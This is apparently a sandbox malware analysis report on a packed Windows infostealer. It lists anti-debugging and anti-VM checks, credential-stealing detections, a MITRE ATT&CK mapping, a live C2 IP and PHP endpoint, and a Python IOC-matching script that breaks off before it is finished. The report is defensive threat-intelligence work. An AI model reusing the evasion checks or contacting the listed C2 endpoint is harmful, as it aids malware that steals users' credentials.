              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10285 second address: 4E1028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1028B second address: 4E1028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1037C second address: 4E10382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10382 second address: 4E10386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10386 second address: 4E1038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8C74 second address: AD8C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AD8EFD second address: AD8F01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe - Special instruction interceptor: First address: 91FB27 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe - Special instruction interceptor: First address: 91D5BE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe - Special instruction interceptor: First address: AF1FA2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe - Special instruction interceptor: First address: ADDDAA instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe - Special instruction interceptor: First address: B56C6B instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe - Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe - Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe - Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27852
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27925
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.8 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006E18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006EE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006E4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ECBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006ECBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006E23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006E2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006ED530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006EDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_006F1BF0
Source: file.exe, file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2220139315.0000000001075000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2220139315.0000000001045000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please, (Oreans.vxd and Software\WinLicense are runtime strings of the Oreans WinLicense/Themida protector, so the VirtualBox ACPI check here belongs to the packer layer, not necessarily to the Stealc payload)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26510)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26665)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26657)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26528)
Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node (graph_0-26677)
Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger (NtSetInformationThread with ThreadHideFromDebugger; the thread no longer delivers debug events to an attached debugger)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass (the window-name probes that follow target Sysinternals Regmon, Filemon and Process Monitor, and OllyDbg)
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE (NTICE, SICE and SIWVID are the SoftICE kernel debugger device names; a successful open means SoftICE is loaded)
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort (NtQueryInformationProcess with ProcessDebugPort; non-zero means a debugger is attached)
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006D4A60 VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F6390 mov eax, dword ptr fs:[00000030h] (reads the PEB pointer from the TEB; BeingDebugged and NtGlobalFlag live in the PEB)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: )Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2D60 GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006F2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2220139315.0000000001018000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2132739933.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 3992, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; a leading number is the count of report signatures mapped to that technique, techniques without a number were not observed for this sample)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
file.exe | 42% | ReversingLabs | Win32.Trojan.Generic
file.exe | 49% | Virustotal |
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://185.215.113.206- | 0% | Avira URL Cloud | safe
http://185.215.113.206/c4becf79229cb002.phps0_ | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpk1G | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpC0o | 100% | Avira URL Cloud | malware
              No contacted domains info
Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.206/c4becf79229cb002.php | false | | high
http://185.215.113.206/ | false | | high
185.215.113.206/c4becf79229cb002.php | false | | high

URLs from Memory and Binaries (the trailing characters s0_, C0o and k1G are bytes that followed the string in memory, not part of the C2 path)

Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.206- | file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.215.113.206/0 | file.exe, 00000000.00000002.2220139315.0000000001039000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.php/ | file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206 | file.exe, 00000000.00000002.2220139315.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://185.215.113.206/c4becf79229cb002.phps0_ | file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpC0o | file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.215.113.206/c4becf79229cb002.phpk1G | file.exe, 00000000.00000002.2220139315.000000000105A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.206 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
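The behaviour signatures at the top of this section and the URL tables just above are what a responder actually takes away from a report like this: a C2 URL and IP to hunt for, plus the anti-analysis checks that explain why the sample may do nothing in a sandbox. The following Python is an added example written for this page; it is not Joe Sandbox code and not part of the sample. It parses signature lines copied from this report into a normalised IOC set and runs that set over a constructed squid-style proxy log. The rule that strips bytes glued onto a script extension (.phps0_, .phpk1G, .phpfalse) is an assumption about how memory-carved strings look, not a documented Joe Sandbox convention, and the proxy log lines are made up for the demonstration.

```python
import re

# Constructed input: signature and URL-table lines copied from the report above.
SIGNATURE_LINES = [
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4E10382 second address: 4E10386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD8C74 second address: AD8C78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion",
    r"Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion",
    r"Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class",
    r"Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg",
    r"Source: C:\Users\user\Desktop\file.exe File opened: NTICE",
    r"Source: C:\Users\user\Desktop\file.exe File opened: SICE",
    "http://185.215.113.206-0%Avira URL Cloudsafe",
    "http://185.215.113.206/c4becf79229cb002.phps0_100%Avira URL Cloudmalware",
    "http://185.215.113.206/c4becf79229cb002.phpk1G100%Avira URL Cloudmalware",
    "185.215.113.206/c4becf79229cb002.phpfalse",
]

# Constructed squid native-format log. Two lines reach the C2 from this report,
# one reaches a neighbour in the same /24 that is NOT in this report's IOC set.
PROXY_LOG = [
    "1732434301.102 18 10.0.0.23 TCP_MISS/200 4120 GET http://example.org/index.html - HIER_DIRECT/93.184.216.34 text/html",
    "1732434312.511 245 10.0.0.23 TCP_MISS/200 512 POST http://185.215.113.206/c4becf79229cb002.php - HIER_DIRECT/185.215.113.206 text/html",
    "1732434312.890 60 10.0.0.23 TCP_MISS/200 77 GET http://185.215.113.206/ - HIER_DIRECT/185.215.113.206 text/html",
    "1732434340.004 12 10.0.0.41 TCP_MISS/200 900 GET http://185.215.113.16/update.bin - HIER_DIRECT/185.215.113.16 application/octet-stream",
]

# Hosts are restricted to dotted IPv4 because every C2 in this report is an IP;
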